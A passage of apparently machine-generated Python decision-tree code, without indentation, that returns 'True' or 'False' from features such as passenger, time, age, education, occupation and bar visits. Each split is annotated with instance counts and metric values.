# {"feature": "Children", "instances": 22, "metric_value": 0.3916, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 13, "metric_value": 0.355, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 9, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Children", "instances": 8, "metric_value": 0.1875, "depth": 12}
if obj[5]<=0:
return 'True'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.375, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Children", "instances": 13, "metric_value": 0.1282, "depth": 11}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
# {"feature": "Time", "instances": 6, "metric_value": 0.2667, "depth": 12}
if obj[1]>0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[1]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[10]<=0.0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[7]<=1:
# {"feature": "Education", "instances": 158, "metric_value": 0.2746, "depth": 8}
if obj[6]<=4:
# {"feature": "Restaurant20to50", "instances": 157, "metric_value": 0.2667, "depth": 9}
if obj[10]<=1.0:
# {"feature": "Gender", "instances": 116, "metric_value": 0.3243, "depth": 10}
if obj[3]>0:
# {"feature": "Time", "instances": 65, "metric_value": 0.3663, "depth": 11}
if obj[1]<=3:
# {"feature": "Children", "instances": 47, "metric_value": 0.4001, "depth": 12}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 32, "metric_value": 0.4043, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Direction_same", "instances": 15, "metric_value": 0.3911, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]>3:
# {"feature": "Children", "instances": 18, "metric_value": 0.2771, "depth": 12}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 11, "metric_value": 0.2975, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.2449, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Time", "instances": 51, "metric_value": 0.2598, "depth": 11}
if obj[1]<=2:
# {"feature": "Children", "instances": 27, "metric_value": 0.1966, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 26, "metric_value": 0.2041, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[1]>2:
# {"feature": "Children", "instances": 24, "metric_value": 0.3299, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 24, "metric_value": 0.3299, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[10]>1.0:
# {"feature": "Children", "instances": 41, "metric_value": 0.0906, "depth": 10}
if obj[5]<=0:
# {"feature": "Time", "instances": 28, "metric_value": 0.1293, "depth": 11}
if obj[1]<=3:
# {"feature": "Gender", "instances": 21, "metric_value": 0.0905, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 20, "metric_value": 0.095, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[1]>3:
# {"feature": "Gender", "instances": 7, "metric_value": 0.2449, "depth": 12}
if obj[3]<=1:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.2449, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>4:
return 'False'
else: return 'False'
else: return 'True'
elif obj[4]>4:
# {"feature": "Education", "instances": 266, "metric_value": 0.3186, "depth": 7}
if obj[6]<=1:
# {"feature": "Occupation", "instances": 136, "metric_value": 0.2522, "depth": 8}
if obj[7]>5:
# {"feature": "Restaurant20to50", "instances": 103, "metric_value": 0.1977, "depth": 9}
if obj[10]<=2.0:
# {"feature": "Time", "instances": 98, "metric_value": 0.1819, "depth": 10}
if obj[1]>0:
# {"feature": "Children", "instances": 78, "metric_value": 0.203, "depth": 11}
if obj[5]<=0:
# {"feature": "Gender", "instances": 59, "metric_value": 0.1806, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 47, "metric_value": 0.1557, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 12, "metric_value": 0.2778, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 19, "metric_value": 0.2481, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 14, "metric_value": 0.3367, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Gender", "instances": 20, "metric_value": 0.0933, "depth": 11}
if obj[3]<=0:
# {"feature": "Children", "instances": 15, "metric_value": 0.1212, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 11, "metric_value": 0.1653, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[10]>2.0:
# {"feature": "Gender", "instances": 5, "metric_value": 0.2667, "depth": 10}
if obj[3]<=0:
# {"feature": "Time", "instances": 3, "metric_value": 0.3333, "depth": 11}
if obj[1]<=2:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]>2:
return 'False'
else: return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[7]<=5:
# {"feature": "Gender", "instances": 33, "metric_value": 0.3409, "depth": 9}
if obj[3]>0:
# {"feature": "Children", "instances": 24, "metric_value": 0.4125, "depth": 10}
if obj[5]>0:
# {"feature": "Time", "instances": 20, "metric_value": 0.375, "depth": 11}
if obj[1]<=2:
# {"feature": "Restaurant20to50", "instances": 16, "metric_value": 0.4375, "depth": 12}
if obj[10]>1.0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.375, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]>2:
return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Time", "instances": 4, "metric_value": 0.3333, "depth": 11}
if obj[1]>0:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[1]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[3]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[6]>1:
# {"feature": "Time", "instances": 130, "metric_value": 0.373, "depth": 8}
if obj[1]<=2:
# {"feature": "Occupation", "instances": 73, "metric_value": 0.3936, "depth": 9}
if obj[7]<=19:
# {"feature": "Restaurant20to50", "instances": 71, "metric_value": 0.3941, "depth": 10}
if obj[10]>0.0:
# {"feature": "Children", "instances": 57, "metric_value": 0.3703, "depth": 11}
if obj[5]>0:
# {"feature": "Gender", "instances": 34, "metric_value": 0.3446, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 24, "metric_value": 0.4132, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.18, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Gender", "instances": 23, "metric_value": 0.3568, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 14, "metric_value": 0.4592, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 9, "metric_value": 0.1975, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[10]<=0.0:
# {"feature": "Gender", "instances": 14, "metric_value": 0.449, "depth": 11}
if obj[3]>0:
# {"feature": "Children", "instances": 7, "metric_value": 0.3429, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Children", "instances": 7, "metric_value": 0.4762, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
elif obj[7]>19:
return 'False'
else: return 'False'
elif obj[1]>2:
# {"feature": "Occupation", "instances": 57, "metric_value": 0.3011, "depth": 9}
if obj[7]<=12:
# {"feature": "Restaurant20to50", "instances": 50, "metric_value": 0.3398, "depth": 10}
if obj[10]>0.0:
# {"feature": "Children", "instances": 42, "metric_value": 0.3558, "depth": 11}
if obj[5]<=0:
# {"feature": "Gender", "instances": 22, "metric_value": 0.2938, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 14, "metric_value": 0.3367, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 8, "metric_value": 0.2188, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 20, "metric_value": 0.4182, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 11, "metric_value": 0.3967, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 9, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[10]<=0.0:
# {"feature": "Gender", "instances": 8, "metric_value": 0.1667, "depth": 11}
if obj[3]>0:
return 'True'
elif obj[3]<=0:
# {"feature": "Children", "instances": 3, "metric_value": 0.3333, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[7]>12:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>3.0:
# {"feature": "Occupation", "instances": 62, "metric_value": 0.437, "depth": 6}
if obj[7]<=12:
# {"feature": "Age", "instances": 47, "metric_value": 0.3928, "depth": 7}
if obj[4]>0:
# {"feature": "Gender", "instances": 39, "metric_value": 0.4538, "depth": 8}
if obj[3]<=0:
# {"feature": "Time", "instances": 21, "metric_value": 0.4636, "depth": 9}
if obj[1]>0:
# {"feature": "Education", "instances": 17, "metric_value": 0.4843, "depth": 10}
if obj[6]>2:
# {"feature": "Children", "instances": 12, "metric_value": 0.4861, "depth": 11}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 12, "metric_value": 0.4861, "depth": 12}
if obj[10]<=4.0:
# {"feature": "Direction_same", "instances": 12, "metric_value": 0.4861, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[6]<=2:
# {"feature": "Children", "instances": 5, "metric_value": 0.48, "depth": 11}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 5, "metric_value": 0.48, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Education", "instances": 4, "metric_value": 0.3333, "depth": 10}
if obj[6]>2:
# {"feature": "Children", "instances": 3, "metric_value": 0.4444, "depth": 11}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[10]<=4.0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[6]<=2:
return 'False'
else: return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Education", "instances": 18, "metric_value": 0.3951, "depth": 9}
if obj[6]<=0:
# {"feature": "Time", "instances": 9, "metric_value": 0.3016, "depth": 10}
if obj[1]>0:
# {"feature": "Restaurant20to50", "instances": 7, "metric_value": 0.2286, "depth": 11}
if obj[10]>0.0:
# {"feature": "Children", "instances": 5, "metric_value": 0.32, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[10]<=0.0:
return 'True'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.0, "depth": 11}
if obj[10]<=0.0:
return 'False'
elif obj[10]>0.0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[6]>0:
# {"feature": "Restaurant20to50", "instances": 9, "metric_value": 0.381, "depth": 10}
if obj[10]>0.0:
# {"feature": "Time", "instances": 7, "metric_value": 0.4762, "depth": 11}
if obj[1]>0:
# {"feature": "Children", "instances": 4, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[1]<=0:
# {"feature": "Children", "instances": 3, "metric_value": 0.4444, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[10]<=0.0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[4]<=0:
return 'True'
else: return 'True'
elif obj[7]>12:
# {"feature": "Time", "instances": 15, "metric_value": 0.3333, "depth": 7}
if obj[1]>0:
# {"feature": "Gender", "instances": 10, "metric_value": 0.4444, "depth": 8}
if obj[3]<=0:
# {"feature": "Age", "instances": 9, "metric_value": 0.4889, "depth": 9}
if obj[4]<=1:
# {"feature": "Children", "instances": 5, "metric_value": 0.48, "depth": 10}
if obj[5]<=0:
# {"feature": "Education", "instances": 5, "metric_value": 0.48, "depth": 11}
if obj[6]<=0:
# {"feature": "Restaurant20to50", "instances": 5, "metric_value": 0.48, "depth": 12}
if obj[10]<=4.0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[4]>1:
# {"feature": "Children", "instances": 4, "metric_value": 0.5, "depth": 10}
if obj[5]<=0:
# {"feature": "Education", "instances": 4, "metric_value": 0.5, "depth": 11}
if obj[6]<=0:
# {"feature": "Restaurant20to50", "instances": 4, "metric_value": 0.5, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[1]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'True'
else: return 'True'
elif obj[12]>2:
# {"feature": "Passanger", "instances": 435, "metric_value": 0.485, "depth": 4}
if obj[0]>0:
# {"feature": "Education", "instances": 419, "metric_value": 0.484, "depth": 5}
if obj[6]>0:
# {"feature": "Age", "instances": 281, "metric_value": 0.4651, "depth": 6}
if obj[4]<=4:
# {"feature": "Time", "instances": 243, "metric_value": 0.477, "depth": 7}
if obj[1]>0:
# {"feature": "Restaurant20to50", "instances": 211, "metric_value": 0.4925, "depth": 8}
if obj[10]<=2.0:
# {"feature": "Bar", "instances": 189, "metric_value": 0.4944, "depth": 9}
if obj[8]>-1.0:
# {"feature": "Occupation", "instances": 187, "metric_value": 0.4977, "depth": 10}
if obj[7]>1:
# {"feature": "Children", "instances": 145, "metric_value": 0.4994, "depth": 11}
if obj[5]<=0:
# {"feature": "Gender", "instances": 87, "metric_value": 0.4994, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 50, "metric_value": 0.4992, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 37, "metric_value": 0.4996, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 58, "metric_value": 0.4986, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 34, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 24, "metric_value": 0.4965, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[7]<=1:
# {"feature": "Children", "instances": 42, "metric_value": 0.4694, "depth": 11}
if obj[5]<=0:
# {"feature": "Gender", "instances": 28, "metric_value": 0.4579, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 15, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 13, "metric_value": 0.4734, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Gender", "instances": 14, "metric_value": 0.4615, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 13, "metric_value": 0.497, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
elif obj[8]<=-1.0:
return 'False'
else: return 'False'
elif obj[10]>2.0:
# {"feature": "Children", "instances": 22, "metric_value": 0.3545, "depth": 9}
if obj[5]<=0:
# {"feature": "Bar", "instances": 12, "metric_value": 0.3714, "depth": 10}
if obj[8]<=2.0:
# {"feature": "Occupation", "instances": 7, "metric_value": 0.2857, "depth": 11}
if obj[7]>6:
# {"feature": "Gender", "instances": 4, "metric_value": 0.5, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[3]>0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[7]<=6:
return 'True'
else: return 'True'
elif obj[8]>2.0:
# {"feature": "Occupation", "instances": 5, "metric_value": 0.3, "depth": 11}
if obj[7]<=1:
# {"feature": "Gender", "instances": 4, "metric_value": 0.375, "depth": 12}
if obj[3]<=0:
# {"feature": "Direction_same", "instances": 4, "metric_value": 0.375, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[7]>1:
return 'False'
else: return 'False'
else: return 'False'
elif obj[5]>0:
# {"feature": "Bar", "instances": 10, "metric_value": 0.0, "depth": 10}
if obj[8]<=3.0:
return 'False'
elif obj[8]>3.0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[1]<=0:
# {"feature": "Occupation", "instances": 32, "metric_value": 0.2983, "depth": 8}
if obj[7]<=9:
# {"feature": "Bar", "instances": 22, "metric_value": 0.3545, "depth": 9}
if obj[8]<=1.0:
# {"feature": "Children", "instances": 12, "metric_value": 0.3714, "depth": 10}
if obj[5]<=0:
# {"feature": "Restaurant20to50", "instances": 7, "metric_value": 0.3429, "depth": 11}
if obj[10]<=1.0:
# {"feature": "Gender", "instances": 5, "metric_value": 0.4667, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 3, "metric_value": 0.4444, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[3]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[10]>1.0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 5, "metric_value": 0.2, "depth": 11}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[10]<=2.0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[8]>1.0:
# {"feature": "Gender", "instances": 10, "metric_value": 0.15, "depth": 10}
if obj[3]>0:
return 'False'
elif obj[3]<=0:
# {"feature": "Restaurant20to50", "instances": 4, "metric_value": 0.25, "depth": 11}
if obj[10]<=0.0:
return 'False'
elif obj[10]>0.0:
# {"feature": "Children", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'False'
else: return 'False'
elif obj[7]>9:
return 'False'
else: return 'False'
else: return 'False'
elif obj[4]>4:
# {"feature": "Occupation", "instances": 38, "metric_value": 0.2545, "depth": 7}
if obj[7]<=7:
# {"feature": "Time", "instances": 21, "metric_value": 0.0833, "depth": 8}
if obj[1]<=1:
return 'False'
elif obj[1]>1:
# {"feature": "Bar", "instances": 8, "metric_value": 0.1667, "depth": 9}
if obj[8]<=0.0:
return 'False'
elif obj[8]>0.0:
# {"feature": "Children", "instances": 3, "metric_value": 0.3333, "depth": 10}
if obj[5]<=0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.5, "depth": 11}
if obj[3]<=1:
# {"feature": "Restaurant20to50", "instances": 2, "metric_value": 0.5, "depth": 12}
if obj[10]<=1.0:
# {"feature": "Direction_same", "instances": 2, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[5]>0:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[7]>7:
# {"feature": "Time", "instances": 17, "metric_value": 0.4412, "depth": 8}
if obj[1]<=1:
# {"feature": "Gender", "instances": 16, "metric_value": 0.4295, "depth": 9}
if obj[3]<=0:
# {"feature": "Bar", "instances": 13, "metric_value": 0.3487, "depth": 10}
if obj[8]<=1.0:
# {"feature": "Children", "instances": 10, "metric_value": 0.1778, "depth": 11}
if obj[5]>0:
# {"feature": "Restaurant20to50", "instances": 9, "metric_value": 0.1778, "depth": 12}
if obj[10]>1.0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[10]<=1.0:
return 'False'
else: return 'False'
elif obj[5]<=0:
return 'True'
else: return 'True'
elif obj[8]>1.0:
# {"feature": "Children", "instances": 3, "metric_value": 0.0, "depth": 11}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[3]>0:
# {"feature": "Children", "instances": 3, "metric_value": 0.0, "depth": 10}
if obj[5]>0:
return 'True'
elif obj[5]<=0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[1]>1:
return 'False'
else: return 'False'
else: return 'False'
else: return 'False'
elif obj[6]<=0:
# {"feature": "Restaurant20to50", "instances": 138, "metric_value": 0.4841, "depth": 6}
if obj[10]<=3.0:
# {"feature": "Time", "instances": 136, "metric_value": 0.4842, "depth": 7}
if obj[1]>0:
# {"feature": "Age", "instances": 113, "metric_value": 0.4751, "depth": 8}
if obj[4]>0:
# {"feature": "Occupation", "instances": 99, "metric_value": 0.4653, "depth": 9}
if obj[7]<=22:
# {"feature": "Gender", "instances": 98, "metric_value": 0.4612, "depth": 10}
if obj[3]<=0:
# {"feature": "Bar", "instances": 51, "metric_value": 0.4093, "depth": 11}
if obj[8]>0.0:
# {"feature": "Children", "instances": 30, "metric_value": 0.48, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 20, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[8]<=0.0:
# {"feature": "Children", "instances": 21, "metric_value": 0.2963, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 18, "metric_value": 0.3457, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]>0:
# {"feature": "Bar", "instances": 47, "metric_value": 0.4823, "depth": 11}
if obj[8]<=0.0:
# {"feature": "Children", "instances": 32, "metric_value": 0.5, "depth": 12}
if obj[5]>0:
# {"feature": "Direction_same", "instances": 22, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]<=0:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.5, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[8]>0.0:
# {"feature": "Children", "instances": 15, "metric_value": 0.44, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 10, "metric_value": 0.42, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
elif obj[5]>0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
else: return 'True'
elif obj[7]>22:
return 'False'
else: return 'False'
elif obj[4]<=0:
# {"feature": "Children", "instances": 14, "metric_value": 0.3117, "depth": 9}
if obj[5]<=0:
# {"feature": "Bar", "instances": 11, "metric_value": 0.3636, "depth": 10}
if obj[8]<=3.0:
# {"feature": "Occupation", "instances": 9, "metric_value": 0.4167, "depth": 11}
if obj[7]>1:
# {"feature": "Gender", "instances": 8, "metric_value": 0.3571, "depth": 12}
if obj[3]>0:
# {"feature": "Direction_same", "instances": 7, "metric_value": 0.4082, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
elif obj[3]<=0:
return 'True'
else: return 'True'
elif obj[7]<=1:
return 'False'
else: return 'False'
elif obj[8]>3.0:
return 'False'
else: return 'False'
elif obj[5]>0:
return 'True'
else: return 'True'
else: return 'False'
elif obj[1]<=0:
# {"feature": "Occupation", "instances": 23, "metric_value": 0.4306, "depth": 8}
if obj[7]>1:
# {"feature": "Bar", "instances": 21, "metric_value": 0.4121, "depth": 9}
if obj[8]<=0.0:
# {"feature": "Age", "instances": 11, "metric_value": 0.3409, "depth": 10}
if obj[4]>1:
# {"feature": "Gender", "instances": 8, "metric_value": 0.3, "depth": 11}
if obj[3]<=0:
# {"feature": "Children", "instances": 5, "metric_value": 0.48, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.48, "depth": 13}
if obj[11]<=0:
return 'True'
else: return 'True'
else: return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
elif obj[4]<=1:
return 'True'
else: return 'True'
elif obj[8]>0.0:
# {"feature": "Age", "instances": 10, "metric_value": 0.2667, "depth": 10}
if obj[4]>3:
# {"feature": "Gender", "instances": 6, "metric_value": 0.2667, "depth": 11}
if obj[3]<=0:
# {"feature": "Children", "instances": 5, "metric_value": 0.32, "depth": 12}
if obj[5]<=0:
# {"feature": "Direction_same", "instances": 5, "metric_value": 0.32, "depth": 13}
if obj[11]<=0:
return 'False'
else: return 'False'
else: return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
elif obj[4]<=3:
return 'False'
else: return 'False'
else: return 'False'
elif obj[7]<=1:
return 'True'
else: return 'True'
else: return 'False'
elif obj[10]>3.0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[0]<=0:
# {"feature": "Children", "instances": 16, "metric_value": 0.1786, "depth": 5}
if obj[5]<=0:
# {"feature": "Age", "instances": 14, "metric_value": 0.0952, "depth": 6}
if obj[4]<=5:
return 'True'
elif obj[4]>5:
# {"feature": "Gender", "instances": 3, "metric_value": 0.0, "depth": 7}
if obj[3]<=0:
return 'True'
elif obj[3]>0:
return 'False'
else: return 'False'
else: return 'True'
elif obj[5]>0:
# {"feature": "Gender", "instances": 2, "metric_value": 0.0, "depth": 6}
if obj[3]<=0:
return 'False'
elif obj[3]>0:
return 'True'
else: return 'True'
else: return 'False'
else: return 'True'
else: return 'False'
elif obj[9]<=0.0:
# {"feature": "Passanger", "instances": 1452, "metric_value": 0.4944, "depth": 3}
if obj[0]<=1:
